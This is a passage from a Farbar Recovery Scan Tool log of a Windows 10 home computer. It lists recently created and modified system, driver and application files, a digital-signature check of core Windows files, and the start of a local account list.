2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00242768 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFNHK64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00232704 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSH64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00225504 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00220136 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSHP64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00201000 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00176480 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00128512 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00120720 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00105720 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFComm64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00103160 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFSAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102136 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFDAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102128 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFHAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00100544 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097976 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097912 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00093144 _____ (Virage Logic Corporation / Sonic Focus) C:\WINDOWS\SysWOW64\SFCOM.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 72212512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
2016-01-15 00:20 - 2016-01-15 00:20 - 03204352 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02902264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2016-01-15 00:20 - 2016-01-15 00:20 - 02058880 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioEQ64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02038904 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 01194856 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSstCApoPropPage.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00267208 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00131016 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2016-01-14 19:58 - 2016-01-14 19:58 - 00027740 _____ C:\Users\sesay\Documents\giftbox.3mf
2016-01-13 22:52 - 2016-01-13 22:52 - 00045864 _____ C:\Users\sesay\Downloads\CurrentEvent-AhmadSesay.pdf
2016-01-13 21:39 - 2016-01-04 21:51 - 07477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-01-13 21:39 - 2016-01-04 21:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2016-01-13 21:39 - 2016-01-04 21:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-01-13 21:39 - 2016-01-04 21:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01804664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00472576 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-01-13 21:39 - 2016-01-04 20:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 01582080 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2016-01-13 21:39 - 2016-01-04 20:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:49 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-01-13 21:39 - 2016-01-04 20:41 - 01070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:40 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:29 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 07826432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:25 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-01-13 21:38 - 2016-01-04 21:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-01-13 21:38 - 2016-01-04 21:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-01-13 21:38 - 2016-01-04 21:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2016-01-13 21:38 - 2016-01-04 21:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-01-13 21:38 - 2016-01-04 21:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2016-01-13 21:38 - 2016-01-04 20:54 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-01-13 21:38 - 2016-01-04 20:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-01-13 21:38 - 2016-01-04 20:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-13 21:38 - 2016-01-04 20:48 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:47 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:44 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:43 - 00953856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-01-13 21:38 - 2016-01-04 20:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-01-13 21:38 - 2016-01-04 20:42 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-01-13 21:38 - 2016-01-04 20:39 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:30 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-13 21:29 - 2016-01-13 21:29 - 00000000 __SHD C:\found.000
2016-01-10 15:27 - 2016-01-10 15:27 - 00001646 _____ C:\Users\sesay\Desktop\Store.lnk
2016-01-05 15:29 - 2016-01-05 15:29 - 05797102 _____ C:\WINDOWS\system32\igdclbif.bin
2016-01-05 15:29 - 2016-01-05 15:29 - 00041296 _____ C:\WINDOWS\system32\iglhxc64_dev.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00040931 _____ C:\WINDOWS\system32\iglhxo64_dev.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00040343 _____ C:\WINDOWS\system32\iglhxo64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00040316 _____ C:\WINDOWS\system32\iglhxc64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00039798 _____ C:\WINDOWS\system32\iglhxg64_dev.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00039658 _____ C:\WINDOWS\system32\iglhxg64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00004778 _____ C:\WINDOWS\system32\iglhxs64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00001125 _____ C:\WINDOWS\system32\iglhxa64.vp
2016-01-05 15:28 - 2016-01-05 15:28 - 00826090 _____ C:\WINDOWS\system32\DisplayAudiox64.cab
2016-01-03 13:04 - 2016-01-03 13:04 - 00001829 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-01-03 13:04 - 2016-01-03 13:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-01-03 13:03 - 2016-01-03 13:04 - 00000000 ____D C:\Program Files\iTunes
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files\iPod
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-01-03 13:01 - 2016-01-14 22:31 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Local\Apple Computer
2016-01-03 13:00 - 2016-01-03 13:00 - 00001921 _____ C:\Users\Public\Desktop\QuickTime Player.lnk
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\Users\MuhammadAkim\AppData\LocalLow\Apple Computer
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\Program Files (x86)\QuickTime
2016-01-03 12:59 - 2016-01-03 12:59 - 00000000 ____D C:\Users\sesay\AppData\Roaming\WildTangent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-31 19:47 - 2015-11-08 19:36 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-31 19:41 - 2015-10-30 02:26 - 00405360 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 19:20 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-31 19:19 - 2015-03-25 08:26 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-01-31 19:11 - 2015-08-16 16:58 - 00000000 ____D C:\Users\sesay\Documents\Youcam
2016-01-31 19:11 - 2015-08-16 16:57 - 00000000 ___RD C:\Users\sesay\OneDrive
2016-01-31 19:10 - 2015-12-07 03:57 - 00000000 ____D C:\Users\sesay
2016-01-31 19:10 - 2015-12-07 03:53 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-01-31 19:10 - 2015-11-08 19:36 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-31 19:10 - 2015-08-16 16:54 - 00000000 __SHD C:\Users\sesay\IntelGraphicsProfiles
2016-01-31 16:43 - 2015-08-18 17:57 - 00000000 ____D C:\Users\hakim\Documents\Youcam
2016-01-31 16:42 - 2015-08-18 17:54 - 00000000 __SHD C:\Users\hakim\IntelGraphicsProfiles
2016-01-31 14:28 - 2015-08-16 12:43 - 00000000 ____D C:\Users\abang\Documents\Youcam
2016-01-31 14:26 - 2015-08-16 16:41 - 00002374 _____ C:\Users\abang\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-01-31 14:26 - 2015-08-16 16:41 - 00000000 ___RD C:\Users\abang\OneDrive
2016-01-31 14:25 - 2015-12-07 03:57 - 00000000 ____D C:\Users\abang
2016-01-31 14:24 - 2015-08-16 12:02 - 00000000 __SHD C:\Users\abang\IntelGraphicsProfiles
2016-01-30 23:37 - 2015-12-07 03:57 - 00000000 ____D C:\Users\hakim
2016-01-30 21:05 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\rescache
2016-01-30 20:50 - 2015-12-07 03:53 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2016-01-30 20:50 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-01-30 13:52 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-29 17:00 - 2015-12-07 03:57 - 00972168 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-29 16:57 - 2015-10-30 01:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-01-29 16:24 - 2015-12-07 04:20 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-28 23:19 - 2015-10-30 01:28 - 02883584 ___SH C:\WINDOWS\system32\config\BBI
2016-01-28 23:19 - 2015-08-16 16:52 - 00017614 _____ C:\bdlog.txt
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-01-28 21:47 - 2015-11-08 19:36 - 00002279 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-28 21:47 - 2015-11-08 19:36 - 00002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-28 21:43 - 2015-08-16 21:31 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Skype
2016-01-28 19:50 - 2015-08-16 20:00 - 00001137 _____ C:\Users\sesay\Desktop\nativelog.txt
2016-01-28 18:44 - 2015-08-16 17:00 - 00000000 ____D C:\Users\sesay\AppData\Roaming\.minecraft
2016-01-28 17:09 - 2015-09-11 20:54 - 00004160 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{C88485DF-0CD3-4055-9814-20A1ED4A410F}
2016-01-28 14:46 - 2015-11-17 17:45 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-28 11:25 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-27 17:46 - 2015-08-16 16:54 - 00000000 ____D C:\Users\sesay\AppData\Local\Packages
2016-01-27 11:39 - 2015-12-23 09:06 - 00000000 ____D C:\Users\sesay\AppData\Local\Screencast-O-Matic-v2
2016-01-26 21:52 - 2015-11-17 17:56 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-01-26 14:10 - 2015-08-16 21:31 - 00000000 ____D C:\ProgramData\Skype
2016-01-25 17:26 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-25 17:25 - 2015-09-01 18:47 - 00000000 ____D C:\Program Files\Java
2016-01-25 17:21 - 2015-08-16 17:03 - 00000000 ____D C:\Users\sesay\AppData\Roaming\InstallShield Installation Information
2016-01-25 17:20 - 2015-11-26 21:57 - 00000000 ____D C:\ProgramData\SkySaga Infinite Isles
2016-01-25 17:19 - 2015-02-11 23:22 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-23 17:26 - 2015-12-18 19:47 - 00000000 ____D C:\Users\sesay\AppData\Local\Gameo
2016-01-23 14:49 - 2015-11-08 19:35 - 00000000 ____D C:\Users\sesay\AppData\Local\Google
2016-01-22 15:20 - 2015-09-01 18:47 - 00000000 ____D C:\Users\sesay\.oracle_jre_usage
2016-01-22 11:50 - 2015-12-07 03:53 - 00012493 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2016-01-22 11:50 - 2015-12-07 03:53 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-01-21 11:19 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Oracle
2016-01-21 11:18 - 2015-09-01 18:47 - 00110176 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge-64.dll
2016-01-21 11:18 - 2015-09-01 18:47 - 00000000 ____D C:\Users\MuhammadAkim\.oracle_jre_usage
2016-01-21 08:51 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-01-21 08:48 - 2015-08-18 20:17 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-01-19 23:15 - 2015-08-07 17:02 - 06588344 _____ (Intel Corporation) C:\WINDOWS\system32\igdusc64.dll
2016-01-19 23:14 - 2015-08-07 17:02 - 26305920 _____ (Intel Corporation) C:\WINDOWS\system32\igd11dxva64.dll
2016-01-19 23:14 - 2015-08-07 17:02 - 13937888 _____ (Intel Corporation) C:\WINDOWS\system32\igd10iumd64.dll
2016-01-19 23:12 - 2015-12-07 03:53 - 00103944 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL
2016-01-19 23:12 - 2015-12-07 03:53 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2016-01-19 23:12 - 2015-08-07 16:58 - 07886296 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\igdkmd64.sys
2016-01-19 23:12 - 2015-08-07 16:58 - 02059272 _____ (Intel Corporation) C:\WINDOWS\system32\igfxLHM.dll
2016-01-19 23:12 - 2015-08-07 16:58 - 00750600 _____ (Intel Corporation) C:\WINDOWS\system32\igfxDH.dll
2016-01-19 23:12 - 2015-08-07 16:58 - 00387080 _____ (Intel Corporation) C:\WINDOWS\system32\igfxDI.dll
2016-01-19 23:12 - 2015-08-07 16:58 - 00373720 _____ (Intel Corporation) C:\WINDOWS\system32\igfxCUIService.exe
2016-01-19 23:12 - 2015-08-07 16:58 - 00354784 _____ (Intel Corporation) C:\WINDOWS\system32\igfxEM.exe
2016-01-19 23:12 - 2015-08-07 16:58 - 00301528 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\IntelCpHeciSvc.exe
2016-01-19 23:12 - 2015-08-07 16:58 - 00269272 _____ (Intel Corporation) C:\WINDOWS\system32\igfxHK.exe
2016-01-15 00:24 - 2015-08-14 18:25 - 03309264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 03075784 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00950600 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00731088 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00461272 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00203432 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2016-01-15 00:20 - 2015-08-14 18:24 - 04695288 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2016-01-15 00:20 - 2015-08-14 18:24 - 00032392 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2016-01-14 23:37 - 2015-12-07 06:46 - 00000000 ____D C:\Windows.old
2016-01-14 22:32 - 2015-08-18 17:45 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Roaming\Skype
2016-01-14 22:32 - 2015-08-15 19:36 - 00000000 ____D C:\Users\MuhammadAkim\Documents\Youcam
2016-01-14 22:31 - 2015-12-20 08:45 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Roaming\Apple Computer
2016-01-14 22:31 - 2015-08-15 19:33 - 00000000 __SHD C:\Users\MuhammadAkim\IntelGraphicsProfiles
2016-01-13 23:05 - 2015-09-16 18:55 - 00000000 ___RD C:\Users\sesay\3D Objects
2016-01-13 21:43 - 2015-08-16 18:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-01-13 21:40 - 2015-08-16 18:55 - 143671360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-01-13 21:31 - 2015-08-16 21:31 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-03 13:09 - 2015-12-06 19:46 - 00000000 ____D C:\Users\sesay\AppData\Local\Apple Computer
2016-01-03 13:03 - 2015-12-06 19:45 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-01-02 20:40 - 2015-10-30 02:26 - 00826872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
 
==================== Files in the root of some directories =======
 
2015-08-16 12:09 - 2015-08-16 12:09 - 0509256 _____ () C:\ProgramData\1439744800.bdinstall.bin
 
Some files in TEMP:
====================
C:\Users\sesay\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\sesay\AppData\Local\Temp\jre-8u71-windows-au.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-01-23 12:09
 
==================== End of FRST.txt ============================
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by MuhammadAkim (2016-01-31 19:57:32)
Running from C:\Users\sesay\Desktop
Windows 10 Home (X64) (2015-12-07 09:29:14)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
abang (S-1-5-21-1436452318-2580999886-2786755032-1002 - Limited - Enabled) => C:\Users\abang
Administrator (S-1-5-21-1436452318-2580999886-2786755032-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1436452318-2580999886-2786755032-503 - Limited - Disabled)
